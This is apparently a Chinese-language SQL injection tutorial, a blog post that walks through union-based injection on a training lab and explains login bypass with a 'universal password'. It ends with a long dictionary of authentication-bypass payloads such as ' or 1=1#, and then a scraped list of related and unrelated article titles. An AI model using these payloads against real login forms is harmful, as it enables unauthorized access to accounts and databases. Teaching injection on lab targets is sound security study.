目录

SQL注入

数据库语句

流程

靶场演示

万能密码漏洞

万能密码字典


SQL注入

什么是SQL注入 : 用户输入的内容被浏览器当做数据库语句进行执行。

关键点:我们一定要输入[数据库语句]

我们输入【数据库语句】,如果这个[网站执行了],就说明这个网站,存在数据库注入漏洞。

数据库语句

select 列名 from 表名 where 条件

select 查询
from  来自 
where 当···条件成立的时候

流程

第一步:判断网站是否存在漏洞
    and 1=1 --> 条件成立,网页有内容
    and 1=2 --> 条件不成立,网页没有内容
        ==>  网站存在SQL注入漏洞。

第二步:判断字段(列)数 ,order by ,排序。
    字段 = 列 。
    order by 1 --> 网页有内容,说明表里面有1列
    order by 2 --> 网页有内容,说明表里面有2列
    order by 3 --> 网页有内容,说明表里面有3列
    order by 4 --> 网页没有内容,说明表里面没有4列                
                ---> 只有3列。

Ps:判断一个网站是否存在数据库注入漏洞,也可以使用order by 判断。

第三步:判断回显点。 union ,能够同时执行两条数据库语句。

关键点:必须保证列数一致。
回显点:能够将我们输入的数据库语句执行,并且将结果显示在网页上。
    
    and 1=2 union select 1,222222,333333

第四步:查数据
    version() # 函数,作用:查询版本号的
    database() # 函数,作用:查库名的。

and 1=2 union select 1,version(),database()

靶场演示(掌控安全学院SQL注入靶场)

第一关:select * from user where id=1

输入  and 1=1

网页有内容

输入 and 1=2

网页没有内容

输入 order by 1

网页有内容

输入 order by 1

网页有内容

输入 order by 3

网页有内容

输入 order by 4

网页没有内容

输入 and 1=2 union select 1,2,3

输入and 1=2 union select 1,222222,333333

输入and 1=2 union select 1,version(),database()


第二关:select * from user where id='1'
    输入and 1=1: select * from user where id='1 and 1=1'
    输入and 1=2:    select * from user where id='1 and 1=2'
    输入' :               select * from user where id='1''
    输入' -- q :        select *from user where id='1' -- q'    
    输入' and 1=1 -- q  select *from user where id='1 ' and 1=1 -- q'

页面有内容

输入' and 1=2 -- q  select *from user where id='1' and 1=2 -- q'

页面没内容

输入' order by 3 -- q

页面有内容

输入' order by 4 -- q

网页没有内容

第三关:select * from user where id= ('1')
    输入') and 1=2 union select 1,2,3 -- q

第四关:select *from user where id=("1")
    输入 ") #  
# =  %23

'') and 1=2 union select 1,2,3 -- q

万能密码漏洞

本质:sql注入漏洞引起的。

select *from user where username ='' and password=''

输入 ' or 2-1=1 -- qwe

select *from user where username ='' or 2-1=1 -- qwe' and password=''

and 前后两条件,都成立,才算成立    
    1=1 and 2=2     
or 前后两条件,只要有一个条件成立,那么就都成立。
    1=1 or 1=2  (成立)

输入admin,123456

输入 ' or 2-1=1 -- qwe

万能密码字典


"or "a"="a
'.).or.('.a.'='.a 
or 1=1--
'or 1=1 -- q
a'or' 1=1--
"or 1=1--
'or.'a.'='a
"or"="a'='a
'or''='
'or'='or'
admin'or 1=1#
admin'/*
aaaa*/'
'or 1=1/*
"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' '1'='1'
'or''='
'or''=''or''='
'or'='1'
'or'='or'
'or.'a.'='a
'or1=1--
1'or'1'='1
a'or' 1=1--
a'or'1=1--
or 'a'='a'
or 1=1--
or1=1--
"or "a"="a
 ')or('a'='a
or 1=1–
'or 1=1–
a'or' 1=1–
"or 1=1–
'or'a'='a
"or"="a'='a
'or"='
'or'='or'
1 or '1'='1'=1
1 or '1'='1′ or 1=1
'OR 1=1%00
"or 1=1%00
'xor
admin' or 'a'='a
'or 1=1/*
something
'OR '1'='1
1'or'1'='
admin' OR 1=1/*
' or 1=1#
'=0#
'>-1#
'<1#
1'<99#
'=0=1#
'<=>0#
'=0=1=1=1=1=1#
'=1<>1#
'<>1#
1'<>99999#
'!=2!=3!=4#
'|0#
'&0#
'^0#
'<<0#
'>>0#
'&''#
'%11&1#
'&1&1#
'|0&1#
'<<0|0#
'<<0>>0#
'*9#
'/9#
'%9#
'+0#
'-0#
'+2+5-7#
'+0+0-0#
'-0-0-0-0-0#
'*9*8*7*6*5#
'/2/3/4#
'%12%34%56%78#
'/**/+/**/0#
'-----0#
'+++0+++++0*0#
'<hex(1)#
'=left(0x30,1)#
'=right(0,1)#
'!=curdate()#
'-reverse(0)#
'=ltrim(0)#
'<abs(1)#
'*round(1,1)#
'&left(0,0)#
'*round(0,1)*round(0,1)#
'=upper     (0)#
' <1 and 1#
'xor 1#
'div 1#
'is not null#
admin' order by'
admin' group by'
'like 0#
'between 1 and 1#
'regexp 1#
'='
'<>'1
'>1='
0'='0
'<1 and 1>'
'<>ifnull(1,2)='1
'=round(0,1)='1
'*0*'
'+'
'-'
'+1-1-'
'+(0-0)#
'=0<>((reverse(1))-(reverse(1)))#
'<(8*7)*(6*5)*(4*3)#
'&(1+1)-2#
'>(0-100)#
' or 1=1#
' or '
' || '


SQL注入-显错注入相关推荐

  1. MYSQL注入-显错注入

    MYSQL注入-显错注入 原理:将插入的数据当作数据库代码执行. 1.首先我们看到页面要判断是否存在注入 2.用 and 1=1 无变化 ; and 1=2 发现有变化,说明可能存在注入 3.对字段进 ...

  2. Webug靶场之旅——显错注入

    显错注入 显错注入是SQL注入的一种,而SQL注入是指web应用程序对用户输入数据的合法性没有判断,导致攻击者可以构造不同的sql语句来实现对数据库的操作. SQL注入漏洞产生的条件: 1.用户能够控 ...

  3. sql显错注入靶机演示

    sql注入漏洞作为web层面最高危的漏洞之一,本文将手动演示sql显错注入的整体流程 注:禁止用于实战 那么开始正文部分,首先打开我们的靶场猫舍 http://cntj8003.ia.aqlab.cn ...

  4. webug 4.0 第一关 显错注入

    感谢webug团队一直以来的更新维护! webug是什么 WeBug名称定义为"我们的漏洞"靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网 ...

  5. SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用

    Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...

  6. SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注

    第26关是单引号字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录 一.功能分析 二 ...

  7. SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注

    第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...

  8. SQLi LABS Less 25 联合注入+报错注入+布尔盲注

    第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...

  9. SQL注入——报错注入

    0x00 背景 SQL注入长期位于OWASP TOP10 榜首,对Web 安全有着很大的影响,黑客们往往在注入过程中根据错误回显进行判断,但是现在非常多的Web程序没有正常的错误回显,这样就需要我们利 ...

  10. webug————显错注入

    1.打开靶场,寻找注入点进行测试 id=1 2.输入':":),进行判断查看是否报错 输入":)页面无变化,'出现报错,说明存在SQL注入 3.注入流程 :寻找注入点->构造 ...

最新文章

  1. 行列式求值、矩阵求逆
  2. 阿里P8大牛耗费三年整理的:Java大厂面试题
  3. python零基础入门教程学习要多久-廖雪峰python教程要学多久-零基础学Python需要多久...
  4. HTML DOCTYPE 的重要性
  5. virtualbox4 剪贴板(共享粘贴板)失效之原因
  6. 初玩PLSQL连接 Oracle
  7. java short float_Java Short floatValue()用法及代码示例
  8. 什么是网络协议转换器?
  9. Apache 服务器配置详解
  10. plsql表锁被占用_处理Oracle被锁住的进程
  11. php 复制mysql数据库_PHP连接MySQL数据库的三种方式
  12. raptor五个数排序流程图_看了这篇文章,我发现排序算法好简单
  13. lzg_ad:XPE中EWF组件
  14. python交通流预测算法_一种高速公路交通流预测方法与流程
  15. 百旺如何看是否清卡_​百旺如何看是否清卡
  16. 制作 macOS Mojave U盘USB启动安装盘方法教程 (全新安装 Mac 系统)
  17. 贵州大学计算机学院研究生成绩查询,贵州大学计算机科学与技术学院2008年硕士研究生初试、复试总成绩一览表...
  18. 【狂神说笔记—— Java基础17-JavaScript,jQuery】
  19. MongoError: The dotted field .. is not valid for storage
  20. python报告的创新点_课题研究中的拟创新点是什么

热门文章

  1. Repoptimizer论文理解与代码分析
  2. Android 小红点 未读消息功能 BadgeHelper
  3. 测试自行车速度的软件,自行车速度测试
  4. XIO: fatal IO error 25 (Inappropriate ioctl for device) on X server “localhost:11.0“
  5. Windows10系统:任务栏中电池图标消失问题的解决方法
  6. 王之泰201771010131《面向对象程序设计(java)》第一周学习总结
  7. 数模2019暑期培训Day1
  8. PUN 2 菜鸟养成记 3进入游戏
  9. 计算机如何手动新建服务启动项,电脑开机设置怎么设置启动项
  10. 双核不可阻挡!首款双核处理器Tegra2详解